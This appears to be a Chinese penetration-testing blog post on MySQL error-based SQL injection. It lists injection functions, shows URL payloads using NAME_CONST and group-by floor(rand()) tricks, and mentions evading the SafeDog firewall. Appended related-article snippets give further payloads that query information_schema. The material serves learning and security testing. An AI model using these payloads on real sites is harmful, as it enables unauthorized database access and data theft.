别人的渗透测试(三)--SQL显错注入

续上一章。

安全狗拦下7成的人,过狗是门学问,偷笑.jpg。很感谢和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究过狗。

说多了,言归正传SQL注入大显错。只适用MYSQL,其它数据库没学呢...

1、count,rand,floor

2、updatexml()【最大长度限制32位】

3、extractvalue()【最大长度限制32位】

4、geometrycollection()

5、multipoint()

6、polygon()

7、multipolygon()

8、linestring()

9、multilinestring()

10、exp()

11、NAME_CONST(适用于低版本)

?id=3&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

12、Error based Double Query Injection

id=99+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

13、以后再添加

2和3只能返回32位长度,如果想再多返回字符串,请使用分页或者截取字符串。/偷笑

前十个博客中如下:

http://www.cnblogs.com/MiWhite/p/6384711.html
http://www.cnblogs.com/MiWhite/p/6254336.html
http://www.cnblogs.com/MiWhite/p/6241265.html

SQL注入的方式好多,待老夫慢慢总结,莫着急。

各位拜拜~下章见。

时间: 2024-10-19 02:31:15

别人的渗透测试(三)--SQL显错注入的相关文章

SQL注入之mysql显错注入

在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面有对应的脚本的话,烦请告知一下,谢谢!. 图1 获取数据库失败 此时我们可以考虑下是否是显错注入,对于显错注入我们可以使用mysql

十种MYSQL显错注入原理讲解(一)

开篇我要说下,在<代码审计:企业级Web代码安全架构>这本书中讲十种MYSQL显错注入,讲的很清楚. 感兴趣请去读完,若处于某种原因没读还想了解,那请继续往下. 1.count,rand,floor select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 函数解释

十种MYSQL显错注入原理讲解(二)

上一篇讲过,三种MYSQL显错注入原理.下面我继续讲解. 1.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 函数讲解: GeometryCollection是由1个或多个任意类几何对象构成的几何对象.GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系).对Ge

MSSQL显错注入爆数字型数据的一点思考

Title:MSSQL显错注入爆数字型数据的一点思考 --2011-02-22 15:23 MSSQL+ASP 最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像"11111111"的这样的数据的,就自己想了下弄了个暂时可以用的方法. 数据库查询如图: 图一: 图二: 图三: 图四: 图五: 下面是实验 表Member 字段Password 语句 ' or 1=convert(int,(select top 1 p

别人的渗透测试(一)

各位好,本系列打算对本人学过的渗透测试知识做一个总结.与此同时希望能够帮助到一些迷茫的人. 渗透测试这门艺术比较难学,首先需要了解程序(前端程序.后台程序.数据库.框架,CMS.....),然后学习常见的手法(SQL注入.XSS.CSRF.文件上传.SSRF....)和使用黑客工具,其次将手法(漏洞原理)和编程相结合生出黑客工具(POC.EXP),最后挖掘应用程序漏洞(代码审计).这只是仅仅的一部分,其实还能结合现有的基础设施或浏览器进行攻击.本人知识层面有限,总结并不完成,欢迎评论补充.渗透测

SQL报错注入结合sqli lab和百度杯CTF VId

0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成. 所有的注入原理都是一样,即用户输入被拼接执行.但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入. 0x01概念 报错型注入的利用大概有以下3种方式: 1:?id=2' and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (select (查询语句)) from information_schema.tables limit 0,1

i春秋——“百度杯”CTF比赛 十月场——Vld(Vulcan Logic Dumper 、php opcode、sql 报错注入)

打开题目看到提示 "do you know Vulcan Logic Dumper?" ,再查看源码看到"<!-- index.php.txt ?>",访问后发现一堆看不懂的东西 这肯定就是所谓的Vulcan Logic Dumper了,先了解下相关概念 PHP内核-Zend引擎:http://www.php.cn/php-weizijiaocheng-355597.html PHP中的opcode:https://blog.csdn.net/weiyu

SQL报错注入的十余种注入方式

报错注入原理: 由于rand和group+by的冲突,即rand()是不可以作为order by的条件字段,同理也不可以为group by的条件字段. floor(rand(0)*2) 获取不确定又重复的值造成mysql的错误 floor:向下取整,只保留整数部分,rand(0) -> 0~1 本地环境搭建数据库测试注入姿势: mysql> create database sqli; mysql> create table user ( id int(11) not null auto_

SQL报错注入总结

1.Floor()报错注入 关于Floor报错注入原理可以看http://blog.51cto.com/wt7315/1891458 获取数据库 select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name from information_schema.tables group by name; 获取表名 select count(*),concat(0x3a,0x3a,(select table_name from i